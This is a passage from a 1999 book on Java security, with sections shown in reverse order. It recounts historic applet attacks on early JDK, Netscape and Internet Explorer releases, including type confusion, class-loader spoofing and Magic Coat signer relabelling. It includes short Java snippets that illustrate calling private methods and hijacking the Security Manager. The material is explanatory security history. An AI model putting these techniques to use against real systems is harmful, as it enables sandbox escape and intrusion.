15 of the 24 total flaws. One of the flaws was serious enough to warrant an immediate patch to the JDK. We describe it now. The most serious flaw was a type-safety error that allowed a number to be converted into a pointer to any object in the VM. An attack applet based on this flaw could gain access to privileged information or otherwise force an illegal operation. As we describe in Chapter 2, type-confusion errors of the sort that this bug could lead to can be used to circumvent Java's security mechanisms entirely. This flaw allowed applets to assign a long or a double into an object reference, which can in turn be used to forge pointers inside the VM. Both JDK 1.0.2 and Netscape's Navigator Gold 3.01 included this bug. Five other type-safety problems were also discovered in Sun's Verifier. One of these errors prompted Sun's security patch. This flaw, which existed in JDK 1.1.1 and JDK 1.0.2, involved the fact that a method can declare its maximum number of locals to be N, but take M arguments in its signature, where M can be greater than N. A description of the type-safety problems can be found at kimera.cs.washington.edu/flaws/sunflaws0423.html. Besides the type-safety flaws, 11 access-flag flaws were identified. One example of such a flaw found in JDK 1.1.1 and JDK 1.0.2 is a flaw in which access flags for some methods are unrestricted. A properly constructed attack might be able to affect type safety and lead to a type-confusion attack. Once again, more information is available on the Kimera Web site. Finally, seven flaws can be classified as instruction or class file validity problems. The most serious of these flaws, found in JDK 1.0.2, was a problem whereby the class namespace management system could become confused by malformed classnames.
Flaws in Microsoft Internet Explorer The Kimera Project's testing methodology uncovered 17 flaws in Internet Explorer versions 4.0 and 3.02. Microsoft released a patch to address some of the more serious problems. Ten of the flaws that applied to the MSIE Verifier also occurred in Sun's Verifier. The most serious flaw was the same flaw discovered in the JDK implementation: the ability to assign a long or a double into an object reference. This flaw prompted the security patch. A list briefly explaining of all the flaws can be found at kimera.cs.washington.edu/flaws/msflaws0423.html.
The Reaction One of the most interesting things about the Verifier bugs discovered by the Kimera group was the way in which the news broke in the press. Somehow, Sun was able to stage a preemptive PR strike before the Kimera announcement was even made. Their version of the story, which was later changed to more closely align with reality, was covered in the Wall Street Journal. In particular, the Sun announcement focused on only one of the many bugs.
The importance of type safety to the Java security model was also reemphasized by the Kimera Project findings. Sun claimed that many problems in the type system might lead to a denial-of-service attack through a crash, but did not acknowledge that it is often trivial to turn these crashes into more insidious type-confusion attacks. The next Java security hole, also discovered by the Kimera Project, served to bring that point home.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Attack Applets: Exploiting Holes in the Security Model Previous
CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 / 9 / 10 / 11 / 12 / 13 / 14 / 15 / 16 / 17 / 18 / 19 / 20 Next Page
Page
Section 15 -- The Magic Coat Chapter 3 serves to emphasize that code signing is complicated. As in the original sandbox model, there is plenty of room for error in designing and implementing a code-signing system. The Magic Coat hole was a fairly straightforward problem in the implementation Java's Class class and was quickly explained on both the Princeton Web site (www.cs.princeton.edu/sip) and JavaSoft's security site (java.sun.com/sfaq). The problem was that the method Class.getsigners() returned a mutable array of all principals that signed a particular class. It was possible for an applet to modify the array, label itself as signed by a trusted principal, and thus gain whatever privileges it wanted. The applet didn't even have to guess which principals were trusted: the system helpfully gave it a list of all known principals "t" and the applet could "try on" the known identities one by one until it found a highly privileged one. The fix was as simple as returning only a copy of the array and not the array itself. Consider a situation in which Alice has been granted no security privilege on a Web user's system. In fact, contrary to what the original JavaSoft statement about the bug claimed, Alice can be completely unknown to the system. In other words, code signed by Alice is not trusted any more than the usual applet off the street. If the Web user (using the HotJava browser, which at the time was the only commercial product that supported JDK 1.1.1) loads an applet signed by Alice, that applet can step out of the sandbox by exploiting the hole. The fact that the system need not have Alice's public key in its database is important. It means that Alice can be any arbitrary attacker who knows how to sign an applet with a completely random identity. Creating such an identity is easy, as is signing an applet with that identity. This makes the hole very serious indeed. The hole allows Alice's attack applet to change the system's idea of who signed it. This is especially bad if Alice is not granted privilege to run outside the sandbox, but Bob is. Alice's applet can exploit the hole to
change its level of permission to include all of Bob's privilege. Alice's applet can get the maximum amount of available privilege doled out to any signer known to the system. If you liken the signature/privilege identities to coats in a closet, Alice's attack applet can try on each coat and attempt various disallowed things until it discovers which of the coats are "magic" and allow it to gain privilege. If a magic coat is discovered, Alice's applet can step out of the sandbox and do things it should not be allowed to do. Trying on coats is as simple as attempting a disallowed call and watching to see what happens. In brief, by exploiting this hole, the Magic Coat attack applet can get a list of all signers known to the local system, determine which if any of those signers is trusted, and then relabel itself so it appears to have been signed by a trusted signer. The result is that the applet can completely evade Java's security mechanisms. JavaSoft fixed the flaw in release 1.1.2 of the JDK. Soon after discovery of the hole, a patch was created and sent to the various Java licensees. Since neither Netscape nor Microsoft supported JDK 1.1 code signing when the hole was discovered, they were not vulnerable. In fact, as Chapter 3 discusses, both Netscape Communicator and MSIE have different models of code signing than Sun does.
Assessing the Bug JavaSoft states correctly that this bug "represents minimal exposure to users" since it affects neither of the popular browsers. It is important to note that HotJava is completely susceptible to this problem unless code signing is entirely disabled. HotJava has always been suspect from a security perspective, and the Magic Coat hole shows why. So was this bug serious? Yes. It provides yet another example of how complicated systems can break down in unexpected ways. Dr. Peter Neumann, moderator of comp.risks and noted security expert said at the time, "This is another instance of an old RISKS story-a surprisingly large portion of the entire infrastructure must be trustworthy, including pieces you might not have realized were critical. That statement is perhaps best thought of as a corollary to Leslie Lamport's classic statement, 'A distributed system is one in which the failure of a computer you didn't even know existed can render your own computer unusable.'"
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Attack Applets: Exploiting Holes in the Security Model Previous
CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 / 9 / 10 / 11 / 12 / 13 / 14 / 15 / 16 / 17 / 18 / 19 / 20 Next Page
Page
Section 14 -- Virtual Voodoo In March 1997, Sun announced the discovery and eradication of a bug in the Verifier of the JDK. The bug was present in all Java VMs, and Sun shipped a patch to Java licensees. Sun claimed that the bug was discovered by the engineering team during a standard security audit and was fixed within 24 hours of discovery. No attack based on this bug was ever devised. In fact, very little information about the fix was disseminated publicly. Statements made by Sun to the press emphasized the complexity of an exploit. Realistically, it sounds like the problem was similar to the You're Not My Type problem-an attacker would need to create malicious byte code to exploit the problem.
Preemptive Strike? We found it a bit peculiar that Sun announced the discovery of a flaw in the Verifier and the dissemination of a patch to vendors. We speculate that someone outside of Sun had discovered the problem and Sun decided to announce the flaw before the discoverer did.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Attack Applets: Exploiting Holes in the Security Model Previous
CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 / 9 / 10 / 11 / 12 / 13 / 14 / 15 / 16 / 17 / 18 / 19 / 20 Next Page
Page
Section 13 -- Cache Cramming The second of the two attacks discovered by Major Malfunction and Ben Laurie in February 1997 works against Microsoft's Internet Explorer browser, but not Netscape. Unlike the minor Steal This IP Address problem, this problem is much more disturbing. On their Web page, www.alcrypto.co.uk/java/, Major Malfunction and Ben Laurie claim "this loophole allows an attacker to connect to any TCP/IP port on the client's machine." That's a bit of an overstatement, but interesting information about listening ports can be gathered (for possible later use), which may leave a firewalled host more susceptible to standard TCP/IPbased attacks. And that's bad news. The Java Security Manager usually disallows port-scanning behavior, but the crackers use the well-known trick of sticking some Java code (in this case, a port scanner) in the browser's cache and later executing it through a file: URL (using frames in the usual way). This attack works because Microsoft's cache layout is transparent. This is an interesting variation on the Slash and Burn attack described on page 153. The attackers cheat a bit for demonstration purposes by having the patsy clear his or her cache, but even without this exercise, guessing the cache location (one of four possibilities) would not be all that much of a challenge. Contrary to their claim, however, Java security rules are no longer relaxed for code loaded out of the cache (unless the cache happens to be in the CLASSPATH, which is not recommended). That problem was fixed in the upgrade to JDK 1.0.2. (Yet another reason that the Slash and Burn attack is obsolete.) In any case, Microsoft apparently places HTML and class files in the same directory stored with their original names (remember, a Java class will only run if it is correctly named). Although MSIE can't browse cache files directly, HTML pages can reference cache files by explicit name. Thus, the file: URL, if properly constructed, can invoke the Java class.
The applet stuffed in your cache is a port scanner. The port-scanning attack works because an applet is allowed to open a socket connection back to where it came from. And guess where it came from: Yep, the client machine. So a port scan is carried out by their cache-bomb applet. Unlike the Steal This IP Address problem, port scanning is very serious. Using this attack, a cracker might be able to discover things like weak sendmails listening on port 25, leaving only the problem of getting the port-scan information back to the cracker site. Accomplished crackers can simply use the URL-lookup covert channel to do this. Unfortunately, this approach is only one of many ways of sending interesting tidbits out from an applet.
Resolution The information released by Major Malfunction and Ben Laurie prompted Microsoft to release a patch to solve the problem.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Attack Applets: Exploiting Holes in the Security Model Previous
CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 / 9 / 10 / 11 / 12 / 13 / 14 / 15 / 16 / 17 / 18 / 19 / 20 Next Page
Page
Section 12 -- Steal This IP Number In a February 1997 post to comp.lang.java.security and Bugtraq, two British consultant/hackers, Major Malfunction (probably not his real name) and Ben Laurie, followed through with their decision to inform the unsuspecting of a couple of new Java-based attacks. Although the pair (and assorted friends) had actually used Java to hack their way through firewalls a month earlier, they thought it only fair to provide Netscape and Microsoft with ample time to address the problems before they went public. The most interesting thing about the two attacks was the fact that one of them (which we call the Steal This IP Number attack) was found only in Netscape, and the other (which we call Cache Cramming) was found only in Internet Explorer. This is interesting because it emphasizes the fact that there are multiple Java implementations, and they are not always equivalent. To be sure, they are all supposed to follow the same specification, but there are many ways to do so. As a result, Netscape's model (which is very close to the JDK implementation) and Microsoft's model differ significantly. This implies that as Java implementations diverge, holes related to implementations will not be cross-platform. It also implies that some implementations will be more secure than others. It is stretching a bit to call the first problem a Java security hole, but because of the way the hole was treated by the community we decided to include a description here anyway. The Steal This IP Address hole, which exists in both Navigator 3.x and 4.0, allows a miscreant to gain access to information from the client machine that would normally be considered secure. The attack works as advertised on the Java/MSIE/Netscape Cache Exploit page (see www.alcrypto.co.uk/java/), but there is really nothing new to this discovery. On their page, Major Malfunction and Ben Laurie say: All we can do is log the real identity of a client machine, despite most precautions they might take to prevent us from doing so . . . Devices such as firewalls, proxies, SOCKS hosts,
etc., all succumb easily to the call of the Java siren . . . Even the mighty anonymizer retires after the first round, nose bleeding and ego bruised. To complete this recipe, we take one call to InetAddress.getLocalHost(), mix it with a call to AppletContext.showDocument() . . . And there you have it. Because the applet is running on the client machine and it is allowed to call InetAddress.getLocalHost(), it can find out the client machine's IP. Although this may surprise some users (especially those using the anonymizer, a proxy meant to protect client browser identities from snooping Web servers), the ferreting out of this information is not really a dangerous new invasion of privacy. The Web is not a private place, and this demonstration only serves to bring that point home. Your browser is probably a blabbermouth. It is a clever move to use Java to look up an IP at the client end through several proxy layers, but not all that clever.
Déjà Vu All Over Again The flaw that appeared in the Netscape browser was actually a flaw that had been discovered and fixed internally by JavaSoft some 10 months before it reappeared. In Sun's JDK 1.0.2 reference implementation of java.net, an applet that calls getLocalHost() does not get a true hostname/IP address; instead, it gets the loopback host ("localhost/127.0.0.1"). For some reason, the change made to fix the privacy hole was not incorporated into Netscape. The fix was exceptionally easy.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Attack Applets: Exploiting Holes in the Security Model CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 / 9 / 10 / 11 / 12 / 13 / 14 / 15 / 16 / 17 / 18 / 19 / 20 Previous Page
Section 11 -- Big Attacks Come in Small Packages
Next Page
We now describe an attack applet that exploits a Java security weakness in beta versions of Microsoft's Internet Explorer 3.0. The weakness allows code in an untrusted applet to pass itself off as part of a Java package. This flaw allows an attacker to gain full access to the victim's files and to the network. Understanding this flaw requires a more detailed explanation of Java packages.
Java Packages The Java language supports the concept of packages-groups of Java classes meant to be used together. Packages have names like java.lang and EDU.princeton.cs.sip. Every Java class belongs to some package. Packages serve two purposes. First, since the full name of a class is the package name followed by the classname, they provide a way for different people to name their classes without having accidental name collisions. For example, if we put all of our classes into the authors package and you put all of your classes into the readers package, then our classnames cannot collide with yours. The second purpose of packages is to restrict access to certain Java variables. When declaring a variable, a programmer states which classes are allowed to access the variable. If the variable is declared private, it is accessible only by the class that created it. If a variable is declared protected, it is accessible only by the creating class and its subclasses. If a variable is declared public, it is accessible by all classes. If a variable is declared neither private, protected, nor public, then it is accessible only by classes in the creating class's
package. Some packages limit their membership to only built-in browser classes. Membership is restricted by having the Virtual Machine ask the Security Manager to pass judgment on every request to join a package. The Security Manager enforces restrictions by prohibiting classes loaded across the Net from joining restricted packages. (For more information on this topic, see Chapter 2.)
What Went Wrong In Microsoft's browser, there was an error in the way the Security Manager made its decisions about package membership. Because of the bug, the Security Manager incorrectly used only the first component of the package name to check access permission. This method failed for packages whose names started with com.ms. Interestingly, several of Microsoft's built-in packages started this way. (This is interesting because the domain name ms.com belongs to Morgan Stanley, not to Microsoft. The package should have been called com.microsoft, although this change would not have prevented the bug.) The result was that untrusted applet code could join a sensitive package, and gain access to any variables in that class that were accessible package-wide. These variables included, among other things, the Security Manager's list of files to which the applet had access. A mischievous applet could access any file on the system by changing the Security Manager's list to include the desired file.
The Reaction This flaw was found just before Microsoft was to ship the first nonbeta version of their Internet Explorer 3.0 browser. Since the ship date had been announced (and a big public release hoopla was planned), the ship date could not be moved. Since the product had a serious security flaw, shipping it was not an acceptable alternative. Microsoft's development team launched a heroic effort to fix the bug, test the solution, and restart the product release cycle in time to meet the original release deadline. They succeeded. The Big Attacks Come in Small Packages bug was the last major flaw found in the JDK 1.0.2 security model implementations. Following discovery of this attack applet, several months went by before JDK 1.1 was released. As we discussed earlier, the period of six months without a major security hole was of long enough duration to convince some people (in particular, Java's most ardent supporters) to declare that all holes had been discovered and that Java had been rendered secure through a series of patches. In fact, the previous version of this book was waved around as a prime example of antiquated old news that no longer applied.
Even if another hole is never discovered in Java (unlikely, but why not dream big?), the information contained in this chapter is important to people charged with designing, managing, and using software in a security-critical situation. We all do well to learn from our mistakes as history often tends to repeat itself.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Attack Applets: Exploiting Holes in the Security Model Previous
CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 / 9 / 10 / 11 / 12 / 13 / 14 / 15 / 16 / 17 / 18 / 19 / 20 Next Page
Page
Section 10 -- Tag-Team Applets The next group of attacks combines the two previous attack methods. By setting up two separate naming environments and passing objects between them, this new group of attacks causes type confusion, leading to security breaches. These attacks are launched by putting two applets on a Web page and having the two applets cooperate. Typically, both applets would be written by the same programmer, and located on the same Web server. To better understand this threat, the next section will examine in further detail how Java manages namespaces. (See also Chapter 2.)
What's in a Name? In a Java-enabled browser, several applets might be running at the same time. Since each applet contains several classes, each with a distinct name, there's a danger that two applets might accidentally use the same name. To prevent this, the Java designers decreed there should be a separate namespace for each applet; that is, each applet should have its own view of which names correspond to which classes. Despite the fact that each applet has its own namespace, there are ways for two applets to pass objects back and forth among themselves. One such channel involves public variables in the Java runtime. Another channel is through manipulating threads. The result is that an applet can potentially have an object whose name is defined in another namespace. Things can get tricky when this happens. For example, suppose that the AncientGreek applet and the
Simpsons applet are running at the same time. Each of the two applets has defined a class called Homer, but they have very different ideas of how Homer should behave. Worse yet, imagine that the two applets communicate, and the AncientGreek applet ends up with a Homer Simpson object. If the AncientGreek applet asks the object what its class is, the object responds, Homer. The AncientGreek applet then asks Homer to recite an epic poem. Depending on your point of view, the result would be either tragic or comical. In any case, it wouldn't be what the programmers wanted. This isn't really a security risk; however, it becomes one if the Java system itself gets confused. The danger is that the system will decide that two unlike types are really the same, when all that is the same is their names. This sort of mix-up would constitute type confusion, and the applet could break the Java type system, leading to a security breach. One way that an applet could do this is by engaging in type punning. The applet would set up two types with the same name, create an object of one type, and then use it as though it were an object of the other type. For example, suppose that this is a Java type: class Secure { private Object secretData; }
Another applet could create another type with the same name: class Secure { // impostor public Object secretData; }
Now if the applet could get an object of the real Secure class and convince Java that the object belonged to the impostor Secure class, Java would allow the applet to access the supposedly private secretData field. As far as Java is concerned, this would be fine. The impostor secretData field is public. The applet would have accessed data it was not supposed to see. Type punning works for method calls, too. If the secretData field were replaced with a dangerousOperation method, then an applet that could do type punning could call the dangerousOperation method even though it was supposed to be private. In summary, if type punning is possible, Java's security collapses. Java prevents type punning by being very careful when deciding whether two classes are the same. Rather than using the classname to make this decision, Java considers two classes the same only if they have the same name and were defined in the same namespace (that is, by the same Class Loader). That is sufficient protection to avoid type punning.
What Went Wrong: A Name Alone Unfortunately, the creators of Java were not always so careful. In Java 1.0.2, Netscape 2.02, and the first beta version of Internet Explorer, the types of interfaces and exceptions were compared by name rather than by (name, namespace) pair as required. This led to a set of attacks that could break Java's security system, achieving full system penetration. The attacks worked as described earlier. The attacker wrote two applets defining different classes with the same name C. One applet would create an object of class C and pass it to the other applet, which would operate on its C. This leads to a classic type-confusion situation, which can be exploited by methods seen several times in this chapter.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Attack Applets: Exploiting Holes in the Security Model Previous
CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 / 9 / 10 / 11 / 12 / 13 / 14 / 15 / 16 / 17 / 18 / 19 / 20 Next Page
Page
Section 9 -- Casting Caution to the Wind Software consultant Tom Cargill has discovered two security flaws related to the way in which Java handles interface types. Both flaws involve a rare case in which Java fails to check whether a method is private. Both also use type-casting operations on Java's interface types. By exploiting these flaws, an attacker can call private methods normally prohibited by Java's security rules. Since some of the securitycritical values inside the Java system are protected by private methods, a complete security breach using this attack is possible.
Simple Interface Casting The core of Cargill's first discovery is shown in the following code: interface Inter { void f(); } class Secure implements Inter { private void f(); } class Dummy extends Secure implements Inter { public void f(); Dummy() { Secure s = new Secure(); Inter i = (Inter) s; i.f(); // should be illegal
} }
This code allows the private f method of class Secure to be called illegally. The Java interpreter fails to determine if f is private when i.f() is called. The Princeton team figured out how to use this flaw to achieve full system penetration. This was done by exploiting the fix to the class loader bug. The class loader bug was fixed by splitting the critical defineClass method into a private method and a public method. The private method, defineClass0, did the work. The public method checked the initialized flag and called defineClass0 only if the flag was true. Since the private defineClass0 method couldn't be called directly by an applet, this was supposed to fix the class loader bug. Unfortunately, a variant of the interface-casting trick shown here allows an applet to call the private defineClass0 method directly, bypassing the check. This meant that the attack could create a class loader by exploiting the Verifier bug. The initialized flag would be false, but that wouldn't matter. A programmer could bypass the flag-check by exploiting the interface-casting trick to call the private defineClass0 method directly. By using this trick, an attacker could gain full system penetration under Netscape Navigator 2.02.
The Full Fix Netscape fixed this problem in two ways. First, it fixed the flaw in its Java Virtual Machine that allowed the interface-casting trick to work. Second, Netscape began storing and checking the initialized flag inside the Java Virtual Machine, rather than in programmer-generated Java code. Netscape eliminated the dangerous defineClass0 operation by integrating everything into the VM's implementation of defineClass. This change took effect in Navigator 3.0beta3. In reaction to the interface-casting bug, Netscape changed its Java implementation to protect itself more generally against an attacker who had the ability to call private methods. By going beyond a simple bug fix to improve the structure of the system, Netscape practiced good security engineering. Its decision paid off when the next bug was discovered.
Advanced Interface Casting Here is the core of Cargill's second discovery:
interface Inter { void f(); } class Secure implements Inter { private void f(); } class Dummy implements Inter { public void f(); static void attack() { Inter inter[2] = {new Dummy(), new Secure() }; for(int j=0; j<2; ++j) inter[j].f(); } }
The first call, inter[0].f(), is legal since Dummy's f method is public. The next time around the loop, inter[1].f() is illegal since Secure's f method is private. In this case, Java was too smart for its own good. In order to improve performance, it only checked for legality the first time through the loop. Theoretically, what was legal the first time would be legal the next time. (See Chapter 2.) Though this is often a correct assumption, it broke down for the code just shown. This trick allows an attacker to call private methods in violation of Java's security rules. Had Netscape not improved the structure of their system after the previous bug was reported, this bug would have once again allowed the class-loader attack to work. However, because Netscape had protected their system against private method attacks, this flaw was not easy to exploit.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Attack Applets: Exploiting Holes in the Security Model Previous
CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 / 9 / 10 / 11 / 12 / 13 / 14 / 15 / 16 / 17 / 18 / 19 / 20 Next Page
Page
Section 8 -- Applets Running Wild The next security problem is the Princeton class-loader attack. This was the most widely publicized of all Java security breaches. The problem was caused by mistakes in the way the Java system integrated separate pieces of code. By corrupting this integration or linking process, an attacker could break through Java's security and do anything at all. To help better understand this issue, the following section looks more closely at how Java manages the dynamic-linking process.
Linking A Java program is composed of several separate pieces called classes. Each class is stored in a separate file, and the Java system uses a just-in-time strategy to load each class only when it is first needed. Just-intime loading allows Java applets to start running quickly, without waiting for the entire applet to be pulled across the Net. It does have one drawback, however: A running applet is usually incomplete. When an applet is built from several code pieces, the system has to be clever enough to make sure that the right pieces are attached in the right places. A Java class file contains a series of instructions telling the Java system how the class should behave. The instructions sometimes reference other classes by name. Since classes are stored separately, the Java system translates each name into the identity of another class. This may involve loading the mentioned class across the Net. The core Java system does not do this translation itself, but outsources it to Java objects called Class Loaders. Outsourcing in this way allows programmers to create their own class loaders, extending Java's linking mechanism.
The interaction between a Class Loader and the core elements of Java is simple. When Java needs to determine which class corresponds to which name, the following steps are followed: 1. Java calls the Class Loader's loadClass method, passing it the name to look up. 2. The Class Loader consults its internal dictionary (which can include a list of built-in classes) to see whether a class with that name already exists. If one exists, that class is returned. 3. If the Class Loader does not have a class with the requested name, it tries to find one. Usually, it does this by fetching the byte code for the class across the Net. 4. After getting the byte code for the class, the Class Loader calls a special method called defineClass to turn the byte code into a usable class. 5. When defineClass is finished, the Class Loader returns the resulting class to Java. The Class Loader's loadClass method returns the class that corresponds to the name being looked up. There are usually several class loaders in operation. When Java needs to translate a name, it asks the Class Loader that originally loaded the class referencing the name. Thus, each Class Loader is responsible for maintaining and defining its own part of the namespace.
Linking and Record-Keeping Because Java has separate namespaces into which classes can be loaded, it can't simply have a unified "phone directory" tracking which class corresponds to which classname. Instead, the Java Virtual Machine maintains a separate directory for each class. These independent directories keep track of the names needed by each class. For example, if class A has a reference to a class called B, the directory for A will have an entry for B that points to the actual class the name represents. Figure 5.5 shows a more complicated example with four classes referencing each other. A big applet could consist of more than four classes, but the idea is the same: The applet is a set of classes that reference each other.
Figure 5.5 Four classes linked together. Each box represents a class. The circled name at the top of each box is the name of the class, and the entries underneath show how the class's namespace is defined.
Attack of the Evil Class Loaders The example described in Figure 5.5 shows reasonable, self-consistent namespaces. The Princeton team discovered that a hostile class loader was capable of setting up a twisted namespace in which different classes had different views of the Java environment. Such inconsistencies can be exploited to create type confusion. A hostile class loader could launch a system-penetration attack. Figure 5.6 shows an example of what an evil class loader can do. The figure shows two classes, A and B, each of which refers to a classname "C". However, the two classes have different ideas of what the name "C" means. Class A points to the class we've labeled C1, while B points to C2.
Figure 5.6 An inconsistent namespace, created by a hostile class loader. Classes A and B have different ideas about what C refers to. This can sometimes be used to confuse the Class Loader.
Suppose that the Java code in class A allocates an object of type "C" and then passes that object to class B. The Java byte code Verifier thinks everything is okay, since an object whose class was named "C" is being passed into code that is expecting an object whose classname is "C". The Verifier allows the operation to proceed. But when class B accesses the object named "C", the true type will be C1, not the C2 that the Verifier approved. An object of type C1 is being treated as though it were of class C2. This is type confusion. When this attack is carried out, the evil class loader is asked twice to say which class corresponds to the name "C". It gives back different answers: C1 for class A, and C2 for class B.
Taking Exception The class-loader attack should have been impossible. Java's security rules prohibit applets from creating class loaders. Unfortunately, the Princeton team discovered a flaw in the byte code Verifier that allowed this rule to be violated. Nothing stops an applet from declaring a new class that is a subclass of the ClassLoader superclass. It is up to the Security Manager to stop the actual construction from occurring. In this case, the Security Manager check is bypassed because of a bug. Read on for the gory details. The rule against making class loaders is enforced by the object-oriented nature of Java. Every Java class extends its superclass. Each class can be thought of as being a specialized version of its superclass.3 Every class has one or more constructor functions, which properly initialize new objects. Java requires each
constructor to call the constructor of its superclass, or another constructor of the same class, before it does anything else. For example, if you create a class called MyHashtable that extends the built-in class java.util.Hashtable, then you have to provide a constructor for MyHashtable. That constructor must call the constructor of java.util.Hashtable before it does anything else. The byte code Verifier ensures that these rules are followed. To prevent applets from making class loaders, the constructor for the class ClassLoader consults the Security Manager, which generates a Security Exception if the class loader being constructed would belong to an applet. This Security Exception can abort the creation of such an object. If an applet defines a new EvilClassLoader class to extend the basic ClassLoader, then the new constructor is required to call Java's basic ClassLoader constructor. Doing so generates a Security Exception that prevents the applet from creating an EvilClassLoader. What the Princeton team discovered was a trick by which a constructor could avoid calling its superclass constructor, without being caught by the Verifier. This allowed them to create an EvilClassLoader whose constructor did not call the basic ClassLoader constructor, and thus was not subject to the normal Security Manager check. The EvilClassLoader could then create type confusion. Having created type confusion, the attacker could then exploit it to achieve full system intrusion; that is, the attacker could do anything at all on the victim's machine.
The (Sort of) Fix Sun Microsystems and Netscape had two options for fixing this problem. They could prevent the superclass-constructor-avoidance by fixing the Verifier, or they could find another way of forcing the basic ClassLoader constructor to be called. They chose to do the latter. They added an initialized data field to every class loader, and set the field to true only when the basic ClassLoader constructor was run. The basic ClassLoader would refuse to perform the crucial defineClass action unless the initialized field was true. The implementation created a new private ClassLoader method called defineClass0. This does the real work of defineClass. Redefining defineClass to check the initialized flag and call defineClass0 only if the flag was true helps to block this particular security hole. The change does not prevent an attacker from making a class loader, but it does prevent an attacker from using the new class loader once it has been made. The change took effect in Netscape Navigator 2.02. Unfortunately, future attacks managed to circumvent this fix.
The Reaction This flaw received more press coverage than any of the others. It had more news interest than the DNS bug because it was more serious. Later bugs did not receive as much coverage because by the time they came to light, the novelty of bug discovery had worn off. That does not mean that the current and future security problems are not just as serious. Whether or not security problems are splashed on the front pages, they still need to be taken seriously. Perhaps the press coverage partly reflected a backlash against the extremely positive hype surrounding most press stories about Java at the time. Java is great, but many of the exaggerated claims went much too far. There was even a story stating that if you wrote programs in Java you would never have to debug them because they would always be right the first time. To be fair, only a little of the hype came from Sun. Much of it came from freelance consultants, self-proclaimed experts, and trainers who had an interest in seeing their Java bandwagon become a juggernaut. When the Applets Running Wild flaw was discovered, Sun Microsystems, Netscape, and the flaw's discoverers gained some valuable experience discussing these issues with each other and with the press. As a result, the parties did a better job of conveying simple and consistent information to the public. Hopefully, this will remain true when future security holes come to light.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Attack Applets: Exploiting Holes in the Security Model Previous
CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 / 9 / 10 / 11 / 12 / 13 / 14 / 15 / 16 / 17 / 18 / 19 / 20 Next Page
Page
Section 7 -- You're Not My Type As discussed in Chapter 2, the most common kind of serious security problem in Java involves type confusion. A type-confusion attack confuses the Java system about the types of data objects it is manipulating. The Java system treats objects as blocks of memory. Allocated memory contains the data fields of all objects, lined up one after the other. When a Java program has a reference to an object, what it really has internally is a pointer to the memory address storing the object. You can think of the pointer as tagged with a type that says what kind of object the pointer is pointing to. As mentioned in Chapter 2, every aspect of Java security depends critically on the type-safety of the language. This means that if Java is going to be secure, it has to make sure that all pointers are properly tagged; that is, the tag must match the actual type of object that is being pointed to. In a type-confusion attack, a malicious applet creates two pointers to the same object-with incompatible type tags. When this happens, the Java system is in trouble. The applet can write into that memory address through one pointer, and read it through another pointer. The result is that the applet can bypass the typing rules of Java, completely undermining its security. Figure 5.4 shows a type-confusion attack at work. The applet has two pointers to the same memory: one pointer tagged with type T and one tagged with type U. Suppose that T and U are defined like this:
class T { SecurityManager x; } class U { MyObject x; }
Now the applet can run code like this: T t = the pointer tagged T; U u = the pointer tagged U; t.x = System.getSecurity(); // the Security Manager MyObject m = u.x;
The result is that the object ends up with a pointer, tagged as having type MyObject, to the memory representing Java's Security Manager object. By changing the fields of m, the applet can then change the Security Manager, even though the Security Manager's fields have been declared private. While this example showed how type confusion can be used to corrupt the Security Manager, the tactic may be exploited to corrupt virtually any part of the running Java system.
